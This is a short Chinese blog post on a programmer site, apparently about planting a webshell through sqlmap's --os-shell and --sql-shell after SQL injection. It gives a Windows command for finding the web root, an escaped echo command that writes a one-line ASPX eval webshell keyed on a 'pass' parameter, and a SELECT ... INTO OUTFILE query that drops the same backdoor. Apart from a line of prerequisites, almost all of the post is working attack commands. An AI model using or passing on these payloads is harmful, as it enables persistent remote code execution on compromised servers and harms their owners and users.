AI智能
改变未来
当前位置:爱站程序员基地 > 全栈知识 > Shell > 正文

关于–os-shell写websell

2021-06-09 分类:Shell 评论(0)

1.首先需要知道目录(web目录)
2.得是DBA权限

寻找web目录
dir C:\\ /s /b | find “xLogin.aspx”

这里需要注意转义^

echo ^<%@ Page Language=\"Jscript\"%^>^<%eval(Request.Item[\"pass\"],\"unsafe\");%^> > \'C://FFJWebTJ//fon.aspx\'

os-shell 无法执行的时候,权限低的时候可以尝试 sql-shell写webshell

select   \'<%@  Page  Language=\"Javascript\"%> <%eval(Request.Item[\"pass\"]);%>\'   INTO  OUTFILE   \'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx\'
赞(0) 打赏
未经允许不得转载:爱站程序员基地 » 关于–os-shell写websell
标签:

相关推荐

热门文章

热门标签

源码 (2093)Java开发 (1438)Python开发 (1301)夸克网盘 (1297)vps商家 (1289)阿里云盘 (1267)Linux (1189)JavaScript (1119)PHP开发 (1058)计算机网络 (1055)MySQL (1015)Go语言 (985)UI/UE (975)CSS (970)人工智能 (933)Shell (930)安卓 (891)Android开发 (873)C# (861)ASP (815)网站架构 (798)IOS开发 (782)JQuery (759)Oracle (684)网络资源 (575)实用工具 (350)微信 (250)C语言/C++ (245)百度网盘 (208)github (155)